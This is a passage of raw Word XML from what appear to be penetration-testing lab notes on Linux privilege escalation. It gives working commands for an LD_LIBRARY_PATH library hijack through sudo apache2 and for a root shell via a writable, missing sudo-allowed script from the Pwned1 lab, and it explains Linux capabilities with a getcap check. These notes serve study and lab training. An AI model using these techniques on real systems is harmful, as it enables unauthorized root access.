          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002324">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002325">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Compile library_path.c into libcrypt.so.1 (replace it with whatever library you want):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002326">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">libcrypt.so.1 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-shared -fPIC library_path.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002327">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run apache2 using sudo, while setting the LD_LIBRARY_PATH environment variable to the current path (where we compiled library_path.c):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo LD_LIBRARY_PATH=. apache2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002329">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000232A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000232B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5167313" cy="3761019"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="176" name="image169.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image169.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId739"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5167313" cy="3761019"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000232C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_exb2attotbad" w:id="308"/>
      <w:bookmarkEnd w:id="308"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Get root shell if a file from sudo -l doesn't exist or you can overwrite it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000232D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId741">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Pwned1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we saw that we can run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/tools/server-health.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as root. But, after trying to inspect the file, we realize it doesn't exist. And when we tried creating the file within </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/tools</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we saw that we could. So, we can put any code inside of a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">server-health.sh </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file that opens a Bash shell, run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/tools/server-health.sh </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">as sudo, and then get a root shell!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000232E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000232F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here's what they did:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002330">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1071"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /opt/tool</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002331">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1071"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">touch server-health.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then copy and paste </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002332">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1071"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or alternatively:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002333">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1071"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo /bin/bash &gt; server-health.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002334">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1071"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 777 server-health.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002335">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1071"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /opt/tools/server-health.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002336">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1253"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This should give us root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002337">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002338">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002339">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000233A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000233B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023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3D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000233E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5fq1sasegyzb" w:id="309"/>
      <w:bookmarkEnd w:id="309"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000233F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002340">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use GTFOBins for Capabilities! They have a section on here</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002341">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002342">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002343">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We learned about Capabilities in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId742">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Empire-breakout</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002344">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_et9nzx9a1q5g" w:id="310"/>
      <w:bookmarkEnd w:id="310"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002345">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to check:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002346">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="196"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/sbin/getcap -r / 2&gt;/dev/null</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002347">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002348">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8d3u81t5hw7" w:id="311"/>
      <w:bookmarkEnd w:id="311"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Capabilities explanation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002349">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000234A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TLDR: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux capabilities help a service do only what it needs as "root" (without all the privileges that come with full root access), rather than allowing it to run with unrestricted root power.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000234B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000234C">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux capabilities</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> are a security feature that breaks up the all-powerful root privileges into smaller, more focused privileges. Instead of a process needing full root access (UID 0) to perform any privileged action, it can be granted only the specific </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">capability</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> it needs. This allows for more fine-grained control over what a program can do—making systems more secure and reducing the damage potential of a compromised binary.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000234D">
      <w:pPr>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example: Why this matters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000234E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's say a binary only needs to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">read arbitrary files</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), but it doesn't need full root access. With traditional SUID, you'd have to give it root, which is dangerous. With </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">capabilities</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
